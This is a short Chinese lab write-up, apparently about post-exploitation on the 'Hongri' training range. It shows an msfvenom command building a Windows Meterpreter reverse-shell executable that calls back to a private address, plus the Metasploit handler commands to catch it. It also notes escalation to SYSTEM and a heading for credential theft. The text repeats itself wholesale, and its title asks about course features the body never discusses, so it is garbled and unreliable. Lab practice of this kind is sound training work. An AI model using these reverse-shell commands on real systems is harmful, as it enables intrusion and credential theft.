红日靶场内网渗透课程有哪些特色?
- 内容介绍
- 文章标签
- 相关推荐
本文共计923个文字,预计阅读时间需要4分钟。
1. 后渗透。
1.前置:我们已经将小马上传,在此处使用webshell进行下一步渗透。
1.使用msf生成exe,并上传:`msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe`
1.后渗透。
之前我们已经将小马上传,在这里用webshell进行进一步渗透。
1)基于msf
利用msf生成exe,并上传。
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 192.168.248.128 set lport 1234 exploit
之后直接进行提权。
2)进行提权。
这里用户为admin,所以可以直接提到system。
3)获取账号密码。
本文共计923个文字,预计阅读时间需要4分钟。
1. 后渗透。
1.前置:我们已经将小马上传,在此处使用webshell进行下一步渗透。
1.使用msf生成exe,并上传:`msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe`
1.后渗透。
之前我们已经将小马上传,在这里用webshell进行进一步渗透。
1)基于msf
利用msf生成exe,并上传。
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 192.168.248.128 set lport 1234 exploit
之后直接进行提权。
2)进行提权。
这里用户为admin,所以可以直接提到system。
3)获取账号密码。

